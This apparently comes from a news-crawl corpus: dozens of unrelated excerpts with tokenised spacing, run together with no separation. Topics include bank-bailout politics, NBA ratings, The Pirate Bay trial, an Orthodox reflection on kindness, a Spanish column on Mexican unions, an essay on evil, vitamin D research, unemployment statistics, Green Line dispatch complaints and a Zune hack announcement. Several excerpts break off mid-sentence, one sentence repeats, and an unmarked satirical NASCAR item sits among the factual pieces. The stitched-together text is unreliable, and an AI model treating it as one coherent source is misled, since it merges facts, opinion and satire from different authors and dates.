And let me assure you , Wall Street is n’t lobbying to prevent future bank bailouts .
If anything , it ’s trying to ensure that there will be more bailouts .
By depriving regulators of the tools they need to seize failing financial firms , financial lobbyists increase the chances that when the next crisis strikes , taxpayers will end up paying a ransom to stockholders and executives as the price of avoiding collapse .
Even more important , however , the financial industry wants to avoid serious regulation ; it wants to be left free to engage in the same behavior that created this crisis .
It ’s worth remembering that between the 1930s and the 1980s , there were n’t any really big financial bailouts , because strong regulation kept most banks out of trouble .
It was only with Reagan - era deregulation that big bank disasters re-emerged .
In fact , relative to the size of the economy , the taxpayer costs of the savings and loan disaster , which unfolded in the Reagan years , were much higher than anything likely to happen under President Obama .
To understand what ’s really at stake right now , watch the looming fight over derivatives , the complex financial instruments Warren Buffett famously described as “ financial weapons of mass destruction . ”
The Obama administration wants tighter regulation of derivatives , while Republicans are opposed .
And that tells you everything you need to know .
So do n’t be fooled .
When Mitch McConnell denounces big bank bailouts , what he ’s really trying to do is give the bankers everything they want .
This is not good news for the NBA .
Preliminary ratings show that television viewers preferred watching NFL prospects walk to a podium last night over seeing NBA postseason baskebtall action .
According to Bloomberg , ESPN 's coverage of the NFL draft outdrew the two NBA playoffs on TNT last night .
An ESPN spokesman said the draft was seen in 5.4 % of households in the top 56 U.S. markets .
A TNT rep said the Cavaliers - Bulls game had a 2.1 rating , and the later Lakers - Thunder playoff earned a 3.0 .
Those are all preliminary numbers .
An Associated Press story this afternoon said the overnight ESPN number was 5.47 .
But the draft also was shown on NFL Network , where AP says it drew a 0.95 rating , for a combined total of 6.42 .
Anyway you cut it , that 's a rough night for the NBA , considering it had superstars LeBron James and Kobe Bryant playing .
-- Tom Weir
Exactly one year ago The Pirate Bay Four were sentenced to a year in prison , and on top of that each ordered to pay $ 905,000 in damages .
The entertainment industries hoped that the ruling would set an example , but today The Pirate Bay is larger than ever before .
Millions of BitTorrent users all around the world followed the Pirate Bay trial with great interest last year .
Many had hoped that the court would decide that operating a BitTorrent tracker was no offense and that the defendants would walk free .
The ten day trial started off with a small victory for the accused .
On the second day the prosecutor announced that half of the charges against the four defendants had been dropped .
The prosecutor could n’t prove that the .torrent files that were submitted as evidence actually used The Pirate Bay ’s tracker and therefore had to drop all charges of ‘ assisting copyright infringement ’ .
What remained was the claim that the Pirate Bay folks were ‘ assisting in making copyright content available ’ .
In the days that followed the defendants ’ lawyers nullified the ‘ assisting ’ part by arguing that there was no link between the accused and users who download copyrighted material .
The prosecution , on the other hand , argued the opposite and brought in screenshots of websites and torrent files as evidence .
On April 17th 2009 , the verdict was announced and Fredrik Neij , Gottfrid Svartholm , Peter Sunde and Carl Lundstrom were found guilty of ‘ assisting in making copyright content available ’ .
The court sentenced each of the defendants to one year in prison and a fine of $ 905,000 .
Immediately after the verdict the defendants announced they would appeal .
In the weeks that followed the news came out that the judge who delivered the verdict had ties to several pro-copyright organizations .
Following this news the defendants ’ lawyers decided to file for a retrial , but this request was denied .
While awaiting the appeal that is currently scheduled to take place during the summer of 2010 , The Pirate Bay continued to operate .
Despite efforts from the entertainment industry to shut it down the site is now bigger than ever before .
At the time of writing The Pirate Bay has 4,349,457 signed up members , growing by 105 members during the time taken to write this article .
This does n’t mean that nothing has changed though .
In the months following the verdict there were plans for the site to be sold to a gaming company who wanted to transform it into a BitTorrent - powered media store .
The takeover plans dominated the news for months but the deal eventually went bust in the fall of last year .
Around the same time , two of the founders of The Pirate Bay were told by the court that they could no longer be involved in the daily operations of the site .
This did n’t change much either because the two had already said that they were no longer involved in its operation .
All this time , The Pirate Bay continued to serve torrents to the public .
Last November , The Pirate Bay decided to close down its tracker .
According to The Pirate Bay team , BitTorrent has evolved up to a point where trackers are no longer needed .
“ We ’re talking to the other torrent admins on doing magnet links , ” a Pirate Bay insider told Torrent Freak at the time , adding that they might even stop serving torrents in the future .
Since November , The Pirate Bay has continued without a tracker , with its website gaining more and more users month after month .
This relative calm is expected to last for a few more months until the appeal trial starts .
When that happens , The Pirate Bay will have close to 5 million registered users , which is 4 million more than when the legal troubles began .
The following quote ( of St. Seraphim of Sarov ) is framed and mounted in the narthex of my parish .
I first obtained the quote from my Archbishop :
You can not be too gentle , too kind .
Shun even to appear harsh in your treatment of each other .
Joy , radiant joy , streams from the face of him who gives and kindles joy in the heart of him who receives .
All condemnation is from the devil .
Never condemn each other …
Instead of condemning others , strive to reach inner peace .
Keep silent , refrain from judgment .
This will raise you above the deadly arrows of slander , insult , and outrage and will shield your glowing hearts against all evil .
I am continuously puzzled by the fact that people are frequently unkind and just as frequently not gentle .
I cannot point to myself as a model in this – I know my transgressions and my sin is ever before me .
But it nevertheless remains a puzzle .
As I ponder the human heart I can see that judgment comes easily to many of us .
And most people who are harsh in their judgments of others are just as harsh in their judgment of themselves .
It ’s as if we had a Freudian Super - Ego living inside our heads judging everything in sight .
Of course , this gives us no peace and robs us of compassion .
It is particularly difficult for religious people – for the expectations we allow ourselves to entertain may be nothing less than perfection .
If you are Orthodox and you ’ve dabbled in the canons or rubrics there are entirely new areas in which to expect perfection .
Of course , the answer to this is not “ lowering expectations . ”
Some fear that anything less than the strictest approach will lead to wanton libertinism .
The answer is have the right expectations .
St. Seraphim did not say , “ You can not be too kind , too gentle , ” because he was a famous libertine or had low expectations of the human capacity for a spiritual life .
He spoke as he did , primarily , because he knew God .
His admonitions do not differ from those of Christ – unless the reader of Scripture is reading with a bitter heart .
The question of right expectations is a matter of reading the gospels correctly and flows from truly knowing God .
Religious knowledge can easily be substituted for knowledge of God – they are not at all the same thing .
The conflict between Christ and the Pharisees has been there for us from the beginning to tell us that religious knowledge is the wrong expectation .
Perfect conformity to religious regulation may indeed be demonic .
It is the Publican who returns home justified rather than the Pharisee ( Luke 18:14 ) .
“ You can not be too kind , too gentle , ” is itself a proper statement of right expectation .
We cannot be too kind , because God Himself is kind , “ to the unthankful and the evil ” ( Luke 6:35 ) .
For various reasons , the religious culture which most of us have internalized maximizes the importance of avoiding sexual temptation , performing certain religious actions ( particularly outward ones ) , maintaining correct belief ( this is particularly important for many Orthodox – and is not incorrect – when rightly practiced ) , and violations of certain moral matters .
These things are not wrong in and of themselves – but they can also be performed ( to some degree ) with no reference to God .
There is the danger of simply becoming conformed to the general and accepted standards of middle - class behavior .
This is a far cry from the Sermon on the Mount , and may completely ignore the matter of the heart – where grace alone can make a difference .
Thus St. Seraphim offers an admonition : “ You can not be too kind , too gentle . ”
Both are actions of the heart ( unless we are simply being unctious like Dicken ’s Uriah Heap ) .
Compassion for others and sympathy for their failings will bring the heart closer to the heart of God than any form of judging .
As St. Seraphim boldly stated : “ All condemnation is of the devil .
Never condemn each other . ”
Somewhile back someone ( not Orthodox ) wrote to me about a recurring problem of anger in dealing with their children .
My suggestion ( very Orthodox ) was to fall down at the feet of the child whenever this happened and to ask for their forgiveness ( like the Orthodox do at Forgiveness Vespers ) .
Such an act of humility not only teaches a valuable lesson to a child but also applied frequently enough to the heart will curb anger ( by God ’s grace ) .
How do we see a heart change ?
By repentance and the sooner the better .
I think the same action , used in a marriage , would often have a beneficial effect .
In Dostoevsky ’s Crime and Punishment , the Prostitute Sonja ( who is truly a saint ) , tells the murderer Raskolnikov , “ Go to the crossroads , bow down to people , kiss the earth because you have sinned before it as well , and say aloud to the whole world : ‘ I am a murderer . ' ”
Her concern is far more for the redemption of his heart , and not for any outward shame or embarassment .
Embarrassment be damned !
A man ’s soul is at stake !
The same is true for us when we turn to questions of kindness or gentleness .
Kindness and gentleness require patience , require restraint , require a compassion that sees the truth of another human being rather than the abstract form of an imagined perfection .
Kiss the earth and do not fear to confess before all men – not if your heart is at stake .
May St. Seraphim pray for us and ask the good God to teach us the true meaning of kindness and gentleness and give our poor hearts the grace to do what seems so hard .
Share this : Twitter
Email
Facebook
More
Print
Reddit
Like this : Like Loading ...
Related
Línea directa | Ezra Shabot
Viernes 19 de marzo de 2010
La institucionalización del sindicalismo en manos del corporativismo priísta alejó a los obreros de la toma de decisiones sobre asuntos que les afectan en su vida cotidiana .
Las negociaciones sobre salarios y condiciones laborales terminaron por ser moneda de cambio de líderes que amasaron enormes riquezas en nombre de la defensa del movimiento obrero .
Los Fidel Velázquez , Romero Deschamps , Gómez Urrutia , y un sinnúmero de pequeños y medianos liderazgos no sólo se alejaron de su compromiso con la clase que supuestamente representaban , sino que saquearon las tesorerías de sus sindicatos y realizaron inmensos negocios a costa los intereses de los trabajadores .
Estos sindicatos vieron debilitada su fuerza con el proceso de apertura democrática en el país y el propio fenómeno de la globalización .
Su fuerza política disminuyó , pero no su capacidad de hacer negocios .
Hoy uno de los enriquecidos líderes como Gamboa Pascoe , se mueve como pez en el agua en medio de una administración panista que lo ve como funcional a su proyecto .
Corrupción , autoritarismo sindical y enriquecimiento de los liderazgos obreros , son perfectamente compatibles con la democracia mexicana que no ha sido capaz de modificar en nada el viejo sistema de control y explotación obrera por parte de sus líderes corporativos .
Hoy , la negociación de una reforma laboral pasa por un acuerdo con los mismos dirigentes que difícilmente aceptarán una reducción en las ganancias de su viejo negocio , a menos que haya un mecanismo de presión real que los obligue a hacerlo .
El PRI de Beatriz Paredes que en voz de esta lideresa ha prometido : “ regresar al partido a sus orígenes ” , supone el reforzamiento de estos liderazgos a cambio de la tradicional sumisión a quien suponen será el próximo presidente de la República en su retorno triunfal a Los Pinos .
Así las cosas , la apuesta priísta de regresar al pasado , en la medida de lo posible , augura una parálisis en varios asuntos , pero primordialmente en una reforma laboral que tome en cuenta la voluntad de los trabajadores por encima de sus liderazgos obsoletos .
Los sindicatos sin obreros son hoy un obstáculo para la modernización del país , pero también lo son para el ejercicio de los derechos mismos de trabajadores hoy sometidos a decisiones de dirigentes que los ven más como parte de un negocio propio , que como sus representados ante el gobierno y los patrones .
La democracia mexicana sin democracia sindical , será una instancia coja incapaz de cambiar la realidad .
Summing up the obvious , professional photography has gone the way of porn : Amateurs , willing to be paid less , dominate .
There ’s an endless supply of shutterbugs giddy for exposure and not giving damn about getting fair price for the goods .
Commissioned work by professional photographers is officially outmoded with lucky shots from Flickr by everyone with a camera ever .
The biz has ceased to be sustainable and struggling photography school grads are bitching about aging housewives making mortgage payment money off of Getty Images in cahoots with Flickr .
Getty Images licensed 1.4 million photos in 2005 and that number ’s up to 22 million last year , all due to user - generated content .
And though an amateur may not be able to repeat that glory shot on demand , there ’s more where that came from ( like 4 billion ) .
| NYT|
Here ’s a photo amateur I took that The Gothamist got from Flickr for their blog .
Why not ?
Here ’s a fascinating table that was linked on Marginal Revolution .
Of all the political jurisdictions in the world , the one most likely to default ( according to market perception ) is Venezuela .
No big surprise , of course , but I was surprised to see California in 8th place .
That ’s worse than Portugal and Spain ( neither of which are in the top 10 , though perhaps bottom 10 would be a better description of this list ) .
This is a very damning indictment of the modern American welfare state .
How about a new motto ?
Instead of “ The Golden State , ” California ’s new motto can be “ Better than Ukraine , Worse than Iraq . ”
Welcome Instapundit readers !
The Devil , so they say , has all the best tunes .
Why is evil so irresistibly glamorous ?
Why is it that when I told my 12 - year - old son that I was writing a book on evil he replied " Wicked ! " ?
Virtue may be admirable , but it is vice we find sexy .
Nobody would have an orange juice with Oliver Twist if they could have a beer with Fagin .
As Oscar Wilde remarked , anyone who does n't find the death of Dickens 's saintly Little Nell uproariously funny must have a heart of stone .
We all love to boo a villain , whether it 's Colonel Gaddafi or Simon Cowell .
Popular culture is obsessed with ghouls and vampires , zombies and monsters ; this Friday , cinema 's archetypal evil guy , Freddy Krueger , returns in a remake of Nightmare on Elm Street .
Nothing is more delightful than being scared to death .
When did evil start to look so alluring ?
One answer might be : when goodness began to look boring .
We can blame this on the puritanical middle classes .
It is they who redefined virtue as thrift , prudence , meekness , abstinence , chastity and industriousness .
It 's not hard to see why some people should prefer zombies and vampires .
Goodness came to seem negative and restrictive .
As the poet Auden wryly remarked , the Ten Commandments consist in observing human behaviour and then inserting a " not " .
Yet goodness had n't always been as dreary as this .
For some ancient thinkers such as Aristotle , it was really a matter of knowing how to enjoy yourself .
It meant learning how to flourish as a human being , developing your humanity to its fullest , finest extent .
Being human on this view is something you have to get good at , like playing the tuba or tolerating bores at sherry parties .
For Aristotle , it had an intimate link with happiness .
Being virtuous for him was the quickest route to well - being .
The good man or woman is one who excels at the precarious business of being human .
Those who become really brilliant at being human – the saints – are the virtuosi of life , the Pavarottis and Wayne Rooneys of virtue .
Goodness is a kind of joie de vivre , a source of energy and high spirits .
As for the New Testament , it is about enjoying an abundance of life , not about paying your taxes and rolling in for work on time .
On this view , vicious people are those who have never got the hang of human existence , as someone might never get the hang of playing poker .
They are lacking , deficient , incapable of being truly alive .
The evil are not really there .
They are unfinished sketches for real human beings .
Like ghosts , they hover between life and death , trapped in some limbo that cuts them off from the human world .
They may look human enough but , like aliens in a horror movie , this is just a phoney appearance .
Evil may look flashy and seductive , but if you poke it , it crumbles away to nothing .
It is as bogus as Gordon Brown 's smile .
The philosopher Hannah Arendt , watching the Nazi genocidist Adolf Eichmann on trial in Jerusalem , realised that the most striking thing about evil was its banality .
Eichmann looked like a harassed bank clerk , not a swashbuckling villain .
He was the supreme bureaucrat .
Bureaucrats do n't like untidiness , and nor does evil .
The evil are revolted by the sheer messiness of human existence .
They are purists who prefer the perfection of death to flesh and blood .
So how do evil individuals try to persuade themselves that they are alive ?
The answer is simple and chilling : by tearing other people apart .
The only thing about them that is not quite dead is the pleasure they reap from destruction .
In this sense , the evil are basically sadists .
Hitler 's henchmen killed Jews because they saw them as a threat to their own purity of being .
They represented an insidious form of non-being which threatened to undermine the Nazis ' own identity .
Yet Jews also symbolised a frightful negativity that lay at the heart of the Nazis themselves , which is another reason why they had to be exterminated .
Beneath the rallies and racial fantasies , the bombast and the marching bands , the Nazis were pure nihilists , in love with death and annihilation .
If they were crazed idealists , they were also utter cynics who delighted in smashing all human meaning and value to pieces .
Pure evil detests the very fact of human existence and wants to wipe it from the face of the earth .
It can see nothing in humanity but a pathetic sham .
It is out to demonstrate that the whole of human life is as empty as itself .
Hell is full of the sniggers and guffaws of those who believe they have seen through the pretentious façade of human existence .
It is a place of farce as well as agony , mockery as well as misery .
It is populated by cynics and buffoons as well as by torturers and rapists .
This is why evil is also entirely pointless .
Common - or - garden wickedness generally has a purpose .
Stalin and Mao murdered countless millions of men and women , but they did not do so just for the hell of it .
There was a political point to their atrocities .
It is much harder to see the point of the Holocaust .
Making a bogeyman of Jews helped to unite the German nation , but you do not need to slaughter six million of them to do that .
The so - called Final Solution tied up equipment and military personnel that could have been useful in the German war effort .
It also disposed of men and women whose skills the Nazis could have exploited .
The Holocaust cannot be understood in terms of everyday utility .
Its obscene excessiveness of all purpose was part of its point .
It was an orgy of meaninglessness as well as an unspeakable tragedy .
The slogan over the gate of Auschwitz – Work Makes You Free – was intended as a cynical jeer , not an uplifting sentiment .
Tragedy usually presupposes a sense of human value .
You would not be moved by the sufferings of Lear if you thought human beings were worthless .
The Nazis , by contrast , were beyond tragedy because they were beyond a sense of human value .
They wanted to murder meaning as well as people .
One of the most grotesque aspects of the concentration camps is the way so much meticulous organisation was pressed into the service of such complete nihilism .
Modern states are rational , utilitarian set-ups , which do nothing without a soberly calculated purpose .
It is astonishing , then , to find a kind of monstrous act of public meaninglessness at the very heart of modern history .
Destruction for destruction 's sake is almost always confined to the private sphere , as with the Moors murderers .
One of the most frightening aspects of Ian Brady and Myra Hindley is that they did not seem to be mad .
Mad people sometimes do pointless things , but when sane men and women destroy just for kicks , we are in the presence of something beyond mere immorality .
The boys who murdered James Bulger seem to have destroyed just for kicks as well .
Yet if they were born evil , as some have suggested , this means that they are innocent .
You can not be held responsible for your genetic make - up , any more than you can be responsible for having cystic fibrosis .
To damn people as evil from birth is actually to excuse them .
The same goes for goodness .
If people are born good , then it would be as pointless to congratulate them on their selfless behaviour as it would be to congratulate them on having red hair and freckles .
If evil exists largely for its own sake , it has an unnerving affinity with good .
The Devil , after all , was once an angel .
God is portrayed by theologians as existing entirely for the sake of his own self - delight .
He did not need to create the world , and nowadays , given its bloodstained history , he is no doubt bitterly regretting that he ever did anything so rash .
Like God , goodness is its own reward .
In fact , it had better be , because it is n't likely to get any other pay - off in this world .
If the very word " virtue " has a mildly ridiculous Victorian ring to it , it is partly because there is something absurd as well as admirable about the good .
In a predatory world , they are bound to appear rather wet behind the ears .
There is something nerdy about goodness .
Trusting , warm - hearted people are likely to be taken for a ride by rogues and tricksters , as so often in the English novel .
The good are bound to end up as victims , and nobody wants to be that .
This is another reason why we prefer Fagin to Oliver , whose prim little Standard English accent belies the fact that he was brought up in a workhouse .
If the evil are dedicated to destruction , then like Milton 's Satan they are bound to be in a permanent sulk .
This is because they need things to exist in order to put their foot through them .
And this means that they are parasitic on goodness .
Even so , putting your foot through something can be intensely creative , as toddlers are aware .
For some people , heaving a brick through a stained - glass window is a lot more creative than actually designing it .
We all derive pleasure from destroying , which is one reason we enjoy violent movies .
The evil are just those people who live this out in practice , killing simply for the hell of it .
This , gratifyingly enough , is pretty rare .
It is just that when it does happen it tends to happen in a big way .
One reason why it is rare is that in order to reject goodness , the evil must first have some experience of it .
Otherwise they are not wicked , simply ignorant .
In traditional religious doctrine , nobody can go to hell unless they have deliberately turned down the love of God .
" I shit on your love ! " the doomed protagonist snarls at his maker in William Golding 's novel Pincher Martin .
But it is surely doubtful that anyone could have a taste of , say , human love and find it completely futile .
Men and women who maim and exploit are not usually evil .
It is rather that they have never had any real experience of love in the first place .
Even a mild deprivation of love can be enough to turn us into monsters .
There is no need to enlist the aid of horned devils for this to happen .
There is another sense , however , in which destruction for its own sake is an everyday affair , at least if Sigmund Freud is to be believed .
Freud believed we reaped pleasure not from annihilating others , but from laying violent hands on ourselves .
In his view , there is a yearning for death at the core of our being .
And one reason why this death wish can become so terrifyingly powerful is that we actually take pleasure in it .
The poor , battered ego relishes the idea of escaping into nothingness .
When this desire becomes irresistible , the result may be suicide .
Nobody would kill themselves unless there was something in it for them .
The suicide says " no " to life because it has become an intolerable burden .
It is not usually existence as such they reject , just their own unbearable bit of it .
Really evil people , by contrast , are out to abolish existence as such .
In their eyes , being as such is bad .
But you cannot abolish being as such , which is another reason why the evil are in such a sulk .
In the words of a character in Dostoyevsky 's The Brothers Karamazov : " The satanic demand that there be no god of life , that God destroy himself and all of his creation .
And they shall burn everlastingly in the flames of their own hatred , and long for death and non-being .
But death shall not be granted them . "
The image shows how the city would look as an archaeological site
A Bronze Age earth ditch has been found in Hereford which archaeologists say may have been used to mark the city 's old tax boundary .
It is 5 m ( 16ft ) deep in places and was found using aerial , laser scanning equipment to map the land 's contours .
The ditch has been filled in with earth over the years and now resembles only a slight depression at ground level .
It runs from Aubrey Street to the River Wye via King Street and may have marked the limit of the king 's jurisdiction .
Site archaeologists said Norman settlements inside the ditch probably fell under the king 's jurisdiction and tax district , while land outside of the ditch beside Hereford Cathedral belonged to the bishop .
Dr Keith Ray , Herefordshire 's county archaeologist , said digital mapping had also produced images of Hereford by night , which highlight the city 's open spaces and dense pattern of narrow alleyways in the historic centre .
He said : " The study concludes that Hereford has one of the best - preserved historic city centres anywhere in England , in which medieval neighbourhoods can still be traced to this day . "
CHARLOTTE , NC — Citing the need to cut travel and promotional costs while still providing a top - notch racing experience for fans , NASCAR president Mike Helton announced Thursday that the schedule for 2011 may consist of a single 21,500 - mile event .
" Holding 36 separate races as we do now is just complicated , and our fans have to learn a lot of different kinds of ovals from week to week , " said Helton , who also confirmed that the three - week race would consist of either 8,600 laps of Daytona 's superspeedway or 43,000 laps of the half - mile " bullring " in Bristol , TN .
" We 're also blessed with a fanbase who , by and large , could watch the whole thing without having to miss any work or school . "
The announcement was met with only moderate enthusiasm by motorsports insiders , who pointed to the NHRA 's disastrous 2003 attempt to condense its season into a single 36 - mile drag race .
Advertisement
April 16 , 2010 ( Toronto ) --
Two new studies add to evidence that older people with low levels of vitamin D may be more likely to suffer from cognitive impairment .
The hope is that vitamin D supplements may be able to slow mental decline -- an intervention that one research team plans to put to the test this summer .
Vitamin D is best known for helping the body absorb calcium , which restores and strengthens bone , protecting against fracture .
But vitamin D also seems to have anti-inflammatory effects that may help keep blood vessels healthy , ensuring nutrient - and oxygen - rich blood flow to brain cells , says Amie Peterson , MD , of Oregon Health & Science University in Portland .
In addition , the presence of vitamin D receptors throughout the brain suggests that it may directly affect brain tissue , she tells WebMD .
From the BLS : Regional and State Employment and Unemployment Summary
Regional and state unemployment rates were little changed in March .
Twenty - four states recorded over - the - month unemployment rate increases , 17 states and the District of Columbia registered rate decreases , and 9 states had no rate change , the U.S. Bureau of Labor Statistics reported today .
Forty - four states and the District of Columbia recorded jobless rate increases from a year earlier , 5 states had decreases , and 1 state had no change .
...
Michigan again recorded the highest unemployment rate among the states , 14.1 percent in March .
The states with the next highest rates were Nevada , 13.4 percent ; California and Rhode Island , 12.6 percent each ; Florida , 12.3 percent ; and South Carolina , 12.2 percent .
North Dakota continued to register the lowest jobless rate , 4.0 percent in March , followed by South Dakota and Nebraska , 4.8 and 5.0 percent , respectively .
The rates in California , Florida , and Nevada set new series highs , as did the rate in Georgia ( 10.6 percent ) .
emphasis added
Click on graph for larger image in new window .
This graph shows the high and low unemployment rates for each state ( and D.C. ) since 1976 .
The red bar is the current unemployment rate ( sorted by the current unemployment rate ) .
Fifteen states and D.C. now have double digit unemployment rates .
New Jersey and Indiana are close .
Four states and set new series record highs : California , Florida , Nevada and Georgia .
Abstract
In this paper we present a simple argument for normalization of the fragment of Martin - Löf 's type theory that contains the natural numbers , dependent function types and the first universe .
We do this by building a realizability model of this theory which directly reflects that terms and types are generated simultaneously .
Hey United States Government — I mean Hollywood , but really it ’s a handful of mega - conglomerates calling the shots for both parties , is n’t it ?
Why else would the U.S. be so obsessed with monetizing intellectual property and masquerading worldwide DCMA - style copyright laws as international trade agreements ?
But I digress .
How ’s that war on terror drugs file sharing going ?
I see you ’ve scored a couple of points over the weekend , all but shutting down is oHunt in the stars & stripes and even pulling the mighty Pirate Bay off the grid for a few precious moments .
And all in advance of the series finale of LOST , the English - speaking world ’s most anticipated old media download that you ca n’t quite figure out how to monetize until it comes out on DVD .
Well done .
But have you checked your rear - view mirror lately ?
Remember that DeBill you managed to get passed in the UK ?
That was awesome .
But the three - strikes law in France ?
Not so much , huh ?
Seems that downloaders there have turned to other services , like RapidShare — which by the way has just scored a big legal precedent on your own soil .
And while I do n’t have the exact numbers handy , it seems that BitTorrent downloads of LOST might end up doing a little better than the sales of locked - down DRM - ridden files on AppleTV .
Wonder what that ’s all about …
I guess your seething hatred of BitTorrent comes from the fact that it represents a much more efficient means of distribution for long - form media like movies and TV .
And it must really be a kick in the nuts that storytellers are realizing that they do n’t need the so - called “ expertise ” of agents , lawyers , producers and distributors to get their work out in front of a vast international audience hungry for new ideas that are n’t sequels to re-imaginings of product placements for kids toys .
I bet you ’d love to have BitTorrent outlawed altogether , if not for those damned commie Linux users and their free operating systems .
You almost had them cornered with your proprietary video codec licensing — that is until Google came to their rescue with the announcement of a free alternative .
Who ’s side are they on , anyway ?
Have you figured out yet that you no longer hold the keys to the world ’s culture ?
That art is no longer a scarce resource , and that your shit movies and TV shows now have to compete with labours of love that talented , forward - thinking folks are making and making available for free , without having to worry about demographics and additional revenue streams ?
Oh , you have n’t ?
Well , this is awkward …
Hodgkin's Lymphoma ( Disease ) has a colorful history :
It was not the first cancer discovered but it was one of the first in which treatments were ...
Undoubtedly with the new major motion picture due out in the near future , there will no doubt be some fair weather Alice in Wonderland fans coming out of the woodwork to profess their love for all that is Alice ( and Johnny Depp , as the case may be ) .
With that in mind , I ’d just like to let everyone know that you ’re not a real fan unless you have just about the entire Alice in Wonderland story inked into the upper half of your body .
There were a few things that ran through my mind when I first saw this picture .
My first thought was that ’s totally awesome , the second was wow that had to hurt like hell but it would have to be a great conversation starter , and finally I thought that I really hope this person trusts whoever does their tattoos .
If you ’re a long time reader here are Walyou , you ’ve seen some pretty rad tattoo displays like the cool Tetris tattoo and of course the Pacman tattoo , but this one has to take the cake .
I think given the choice between these I ’d have to go with Tetris … but I guess I ’m not hardcore enough to be a Disney fan if this is any indication .
Now aside from the obvious practical issues , you have to admit this is pretty cool .
All of your favorite characters from the animated movie are here , including the Mad Hatter , Chershire Cat , and of course some of the card soldiers .
I ’d like to see a view from the front as well , but I ’m not sure how much you could see without venturing into the land of inappropriate .
One has to wonder if we wo n’t see similar tattoos when the live action version of the story comes out .
Personally I think having Johnny Depp staring at me for the rest of forever would be pretty creepy , but I ’d be willing to bet there are some ladies out there who would disagree .
Of course you might run into some copyright issues there …and getting a tattoo of that magnitude removed would take some serious pain and money !
Tattoo Artist : Holly Azzara Via : Rainbow Zombies Ate My Unicorn
This is not satire .
This is not a joke .
This is actually happening in Afghanistan .
And we are paying billions of dollars to enable this travesty :
For several years , Afghan police recruits under the tutelage of private U.S. government contractors could n't understand why their marksmanship never improved .
The answer became clear earlier this year .
Italian contractors also helping to train Afghan volunteers showed them that the sights on their AK - 47s and M - 16s had never been adjusted .
" We 're paying somebody to teach these people to shoot these weapons , and nobody ever bothered to check their sights ? "
Democratic Sen. Claire McCaskill of Missouri said , after relating that story at a hearing Thursday .
To McCaskill , who chaired the hearing of the Senate Contracting Oversight panel , it illustrated why the U.S. has spent more than $ 6 billion on private contractors , but the police - training program remains rife with problems .
" It is an unbelievable , incompetent story of contracts , " she said .
" For eight years we have been supposed training the police in Afghanistan .
We 've flushed $ 6 billion . "
Improving and expanding the 90,000 - man Afghan National Police to maintain stability and protect the population is crucial to the Obama administration 's plan to begin reducing the American military presence in July 2011 .
But the training contracts have been plagued by mismanagement .
Investigations by the Government Accounting Office and the inspector generals from the Departments of State and Defense have sharply criticized both the contractors and the government oversight .
They detailed a lack of supervision and controls over spending , among other failures .
" Just about everything that could go wrong here has gone wrong , " Defense Department Inspector General Gordon Heddell told the subcommittee ... read on
How embarrassing .
WTF is Blackwater , I mean Xe , doing getting cash out of the government ?
That 's what happens when Republicans start wars .
They outsource the troops and then you 're stuck with contractors because we do n't have the manpower to do the job .
Getting out of there should be our highest priority .
Exiting out of Iraq and Afghanistan would be awesome for so many reasons but one that 's way down the list is that I will make it my mission to never let Blackwater receive a nickel of our money again .
Why are n't the teabaggers complaining that $ 6 billion of our tax money was spent on this war ?
And for all of our tax dollars , the Afghanistan soldiers are woefully inadequate .
It would appear that Marines do not like going into battle with them .
Many things have changed in the world of tree planting since its inception , yet so much of it remains the same .
HIGHBALLER is a ...
Brian Clague is a busy musician who makes up to eight trips a day on the MBTA and tells GlobeWatch he ’s aggravated by what he calls the T’s “ infuriating ’ ’ practice of sending several Green Line trains at once for no apparent reason .
Though it happens on the B and D lines , too , the problem most often occurs on the C line , he says .
“ C trains outbound [ come ] in rapid succession , the first being jammed full and the rest being almost empty , and then expressing three of them in a row past freezing passengers waiting for an inbound train , ’’ he wrote in an e-mail .
“ Perhaps rush hour is the worst .
Obviously some allegedly professional dispatcher is sending these trains when what we need is simply a train every x minutes , x being a smaller number at rush hour or during sporting events or other large crowd moments .
. . .
What ’s particularly infuriating is when you ’ve waited for a long time , ca n’t get on the first train , squeeze onto the second train , and then they announce that they are expressing that train to thus and so and everybody has to get off and wait for a third train , onto which they may or not get on . ’’
Clague says the problem also exists on bus lines , particularly the No. 1 bus that travels between Cambridge and Roxbury .
“ The T can explain it as a traffic issue but it ’s not , it ’s a dispatch issue , which you can determine by sitting in Harvard Square and watching the departure frequency of the No. 1 bus .
They ’ll send four No. 1 buses — one right after another — and then not send another for half an hour .
I think some of this is the drivers wishing to get to the end of their run for their coffee break , or to sign out and go home , ’’ he wrote .
European cities use computerized dispatch systems to make sure service matches the appropriate level of demand coverage , Clague says .
“ Is it really rocket science to send a train out at regularly scheduled intervals — perhaps adjusted for rush hour or known traffic jams like ballgames — to avoid this wasteful use of empty trains ?
I think the arrival of a new MBTA general manager provides an excellent opportunity to see if the GM intends to look into this as both a resource management and customer service issue . ’’
THE MBTA RESPONDS
“ The Green Line schedules trips on the Beacon Street line every six minutes from Cleveland Circle during the rush hours , ’’ wrote Lydia Rivera , a Massachusetts Bay Transportation Authority spokeswoman , in an e-mail .
“ The Green Line schedules trips on the Beacon Street line every six minutes from Cleveland Circle during the rush hours , ’’ wrote Lydia Rivera , a Massachusetts Bay Transportation Authority spokeswoman , in an e-mail .
“ Once a train leaves , many variables like intersections , autos on the right of way , and heavy passenger boarding . . . can take place , ’’ she wrote .
“ Green Line operators never make adjustments such as expressing or holding on their own . ’’
The spacing between cars is monitored by inspectors and dispatchers who have a better picture of what ’s going on by monitoring vehicles remotely on computer screens to gauge train traffic , she said .
“ They make adjustments like expressing of trains or crossing back trains at Coolidge Corner and / or short - tripping in an attempt to get trains back on schedule .
If we did n’t do that , we would be running behind schedule inbound and outbound .
We do not have the luxury to ‘ go around ’ a train , ’’ she wrote .
Rivera added “ every attempt ’’ is made to get trains back on schedule and to reduce delays by having staffers “ constantly ’ ’ review schedules to make necessary adjustments .
As for drivers who skip over waiting passengers , Rivera said that ’s not allowed and the T “ will interview and possibly discipline employees who are in violation of our rules . ’’
© Copyright 2010 Globe Newspaper Company .
Well , it looks like the first 64GB Zune HDs landing in customers ' hands may not be the biggest Zune news today after all .
As proudly announced the ZuneBoards website , the Zune HD -- and all earlier Zunes , although the potential there is a tad more limited -- " have been hacked . "
While obviously not the first hack of any sort for the devices , this is described as the " first true hack , " and it has made the concurrently - released OpenZDK possible .
That effectively gives developers " access to everything XNA withheld before , " which more or less opens to doors to any type of application that can run on the Zune hardware -- games , emulators , app stores , you name it .
Of course , there 's not a ton for average Zune users to play with at the moment , but developers can find all they need to get cracking at the source link below .
[ Thanks , jhoeforth & Dilpickle1 ]
The Supreme Court is asking for more federal security funds , citing as one reason the “ volume ” of threats it receives .
